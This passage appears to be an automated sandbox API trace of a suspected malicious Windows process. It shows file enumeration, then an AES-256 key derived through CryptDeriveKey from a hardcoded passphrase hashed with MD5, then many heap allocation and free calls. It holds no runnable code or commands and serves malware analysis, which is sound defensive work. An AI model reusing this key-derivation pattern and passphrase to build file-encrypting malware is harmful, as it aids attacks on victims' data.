ftCreationTime.dwLowDateTime=0x9c618140, ftCreationTime.dwHighDateTime=0x1d5ee39, ftLastAccessTime.dwLowDateTime=0x494d4a60, ftLastAccessTime.dwHighDateTime=0x1d5e589, ftLastWriteTime.dwLowDateTime=0x494d4a60, ftLastWriteTime.dwHighDateTime=0x1d5e589, nFileSizeHigh=0x0, nFileSizeLow=0x132ca, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="PhzRCCH.jpg", cAlternateFileName="")) returned 0x41ac100 [0134.727] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0134.727] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0134.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0134.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0134.728] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.729] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0134.729] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0134.729] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.729] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0134.730] CryptHashData (hHash=0x41ac140, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0134.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.730] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cafb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0134.730] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac440) returned 1 [0134.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0134.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0134.772] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0134.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0134.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0134.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0134.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0134.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0134.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0134.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0134.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0134.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0134.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0134.776] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0134.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0134.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0134.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0134.776] CryptDestroyHash (hHash=0x41ac140) returned 1 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0134.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0134.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0134.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0134.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0134.778] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0134.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0134.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0134.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0134.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0134.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0134.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0134.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0134.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: 